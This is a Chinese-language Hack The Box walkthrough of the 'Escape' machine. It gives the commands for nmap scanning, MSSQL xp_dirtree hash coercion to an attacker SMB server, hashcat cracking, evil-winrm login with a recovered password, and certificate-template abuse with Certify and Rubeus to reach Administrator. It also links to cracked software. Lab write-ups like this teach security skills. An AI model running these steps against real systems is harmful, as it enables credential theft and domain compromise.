0


HTB打靶日记:Escape

信息收集

TCP协议:

nmap -p- -sT --min-rate=1000 -Pn 10.129.221.221

UDP协议

nmap -p- -sU --min-rate=1000 -Pn 10.129.221.221

将开放的端口整理一下,探测一下对应服务

nmap -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49689,49690,49710,49714 -Pn -sT -sC -sV  10.129.221.221

发现了域名sequel.htb以及子域名dc.sequel.htb,加入hosts文件中

53端口开放尝试区域传输

dig 10.129.221.221  axfr sequel.htb

389端口开放,探测一下没有发现什么有用的信息

ldapsearch -H ldap://sequel.htb  -x -s base -b '' "(objectClass=*)" "*" +

445端口开放,尝试未授权访问,在Public这个公共文件夹下,发现了一个PDF,看命名似乎与MSSQL有关,并且机器开放了1433端口,猜测突破点应该在此

果然在PDF中发现了一对用户名与密码

利用navicat连接mssql数据库(Navicat:Navicat Premium16.0.10 Linux中英文破解版 - 法海之路)

尝试xp_dirtree,并利用imparket包中的smbserver接收请求

xp_dirtree '\\10.10.14.4\share'

impacket-smbserver share .  -smb2support

执行后成功接收到了sql_svc的ntlmv2 hash

在example_hashes [hashcat wiki]上查了一下hashcat的-m参数对应的数

将刚才得到的sql_svc保存到hash文件中,利用利用hashcat成功破解了hash,获取了sql_svc密码

hashcat hash -m 5600 /usr/share/wordlists/rockyou.txt

机器上的5985端口开放,使用evil-winrm利用刚才获取的账户密码成功登陆机器

evil-winrm -i 10.129.221.221 -u sql_svc  -p REGGIE1234ronnie

通过在当前主机上翻找信息,在sqlserver目录下发现了logs文件夹,文件夹中有一个日志文件

在日志中看到了两个登陆失败的记录,并且当时在users目录下发现了Ryan.Cooper用户的文件夹

利用evil-winrm成功登陆Ryan.Cooper用户会话

在desktop目录下发现了第一个flag

在没有发现明显漏洞后,尝试利用Certify.exe寻找易受攻击的证书模板

.\Certify.exe find /vulnerable

发现了存在漏洞的证书模板

在HackTricks查看漏洞利用手法(https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation)

.\Certify.exe request   /altname:Administrator /template:UserAuthentication /ca:dc.sequel.htb\sequel-DC-CA

将私钥部分保存为private.key,将证书部分保存为cert.pem

在命令中加入-inkey指定私钥即可生成cert.pfx格式的证书

openssl pkcs12 -in cert.pem -inkey private.key  -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

上传刚刚获取的证书以及rubeus

利用Rubeus成功获取管理员hash

.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials

利用刚刚获取的hash成功登陆管理员会话

拿到了第二个flag


本文转载自: https://blog.csdn.net/m0_73998094/article/details/129340960
版权归原作者 文(备考oscp版~) 所有, 如有侵权,请联系我们删除。

“HTB打靶日记:Escape”的评论:

还没有评论